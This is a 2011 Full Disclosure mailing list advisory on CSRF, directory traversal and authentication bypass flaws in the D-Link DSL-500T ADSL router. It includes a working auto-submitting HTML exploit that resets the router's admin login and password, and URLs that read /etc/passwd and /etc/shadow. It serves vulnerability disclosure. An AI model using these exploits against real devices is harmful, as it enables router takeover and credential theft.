Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

CSRF, DT and AB vulnerabilities in D-Link DSL-500T ADSL Router

From: "MustLive" <mustlive () websecurity com ua>
Date: Tue, 20 Dec 2011 01:28:21 +0200
Hello list!

I want to warn you about new security vulnerabilities in D-Link DSL-500T 
ADSL Router.

These are Cross-Site Request Forgery, Directory Traversal and Authentication 
Bypass vulnerabilities. This is my fifth advisory (#3 and #4 were announced 
and will be disclosed later, after giving the time for D-Link to fix those 
vulnerabilities) from series of advisories about vulnerabilities in D-Link 
products.

-------------------------
Affected products:
-------------------------

Vulnerable is the next model: D-Link DSL-500T, Firmware 
V1.00B02T02.RU.20050223. This model with other firmware versions is also 
vulnerable, and also other models of routers from D-Link can be vulnerable.

----------
Details:
----------

CSRF (WASC-09):

All functionality of admin panel of the router has CSRF vulnerabilities. For 
example, the next CSRF-request allows to change login and password of 
administrator.

D-Link DSL-500T CSRF.html

<html>
<head>
<title>D-Link DSL-500T CSRF exploit (C) 2011 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://192.168.1.1/cgi-bin/webcm"; method="post" 
enctype="application/x-www-form-urlencoded">
<input type="hidden" name="getpage" value="../html/tools/usrmgmt.htm">
<input type="hidden" name="security:settings/username" value="admin">
<input type="hidden" name="security:settings/password" value="password">
<input type="hidden" name="security:settings/password_confirm" 
value="password">
<input type="hidden" name="security:settings/idle_timeout" value="30">
</form>
</body>
</html>

All other functions in admin panel are also vulnerable to CSRF. And if to 
use XSS and DT, then it'll be possible to remotely read arbitrary files from 
the router.

Directory Traversal (WASC-33):

In 2006 in other models of D-Link's routers DT vulnerability was found 
(CVE-2006-2337). It also exists in this model, as I've checked (but as 
opposed to the description of DT in other models, in my model the 
authentication is required).

http://192.168.1.1/cgi-bin/webcm?getpage=/etc/passwd
http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow

It's possible to read arbitrary files from the router. But this 
vulnerability works only after authentication.

Authentication Bypass (WASC-01):

In 2005 in other models of D-Link's routers AB vulnerability was found 
(CVE-2005-1680). It also exists in this model, as I've checked.

It's possible to send commands to application firmwarecfg without 
authentication. Which allows e.g. to receive configuration file with login 
and password of administrator. For getting access to admin panel.

------------
Timeline:
------------

2011.12.17 - disclosed at my site.

I mentioned about these vulnerabilities at my site 
(http://websecurity.com.ua/5581/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: